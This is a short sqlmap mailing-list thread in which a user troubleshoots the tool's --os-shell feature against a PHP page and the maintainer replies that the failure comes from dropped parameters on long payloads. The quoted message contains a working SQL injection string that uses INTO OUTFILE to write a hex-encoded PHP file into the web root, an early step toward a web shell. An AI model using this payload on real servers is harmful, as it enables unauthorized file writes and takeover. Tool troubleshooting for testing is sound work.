Re: [sqlmap-users] the default --os-shell payload could not upload
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] the default --os-shell payload could not upload
|
From: Miroslav S. <mir...@gm...> - 2012-12-17 12:26:10
|
Undefined index while used for sure is a sign of dropped parameters almost always in cases of long payloads Kind regards, Miroslav Stampar On Dec 17, 2012 1:21 PM, "li" <li...@gm...> wrote: > Hello there, > > > i just get a problem when i use the --os-shell command.english is not my mother languag.But i will try my best to explain the situation. > > when i use the default --os-shell payload ,it does not work.the server respose is > > HTTP/1.1 200 OK > > Date: Mon, 17 Dec 2012 11:42:34 GMT > > Server: Apache/2.2.16 (Debian) > > X-Powered-By: PHP/5.3.3-7+squeeze14 > > Vary: Accept-Encoding > > Content-Length: 1858 > > Content-Type: text/html > > and a error message in the page : > > Notice: Undefined index: id in /var/www/cat.php on line 6 > > the 6th line in my cat.php is : > > <?php > > require “header.php”; > > $pics = Picture:all ($_GET[“id”]); ------the sixth line. > > but if i shorten the payload .just like > > > > 1%20LIMIT%201%20INTO%20OUTFILE%20'/var/www/tmpuyvgq.php'%20LINES%20TERMINATED%20BY%200x3c3f7068700a696620286973737d3f3e0a%20-- > > this payload would work.the file is written .and the server response : > > Mon, 17 Dec 2012 12:02:17 GMT > > Server: Apache/2.2.16 (Debian) > > X-Powered-By: PHP/5.3.3-7+squeeze14 > > Vary: Accept-Encoding > > Content-Length: 1211 > > Content-Type: text/html > > also with an error message: > > Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean > given in /var/www/classes/picture.php on line 22 > > i thougth maybe the length of the url is too long .maybe there is some > error in my php conf.but i thought the default should works on all kinds of > situation.i could not figure out the problem. > > thanks everyone. > > by the way. i could not receive the mailing list content.i dont know if > you can receive this email. > > > > ------------------------------------------------------------------------------ > LogMeIn Rescue: Anywhere, Anytime Remote support for IT. Free Trial > Remotely access PCs and mobile devices and provide instant support > Improve your efficiency, and focus on delivering more value-add services > Discover what IT Professionals Know. Rescue delivers > http://p.sf.net/sfu/logmein_12329d2d > _______________________________________________ > sqlmap-users mailing list > sql...@li... > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > |
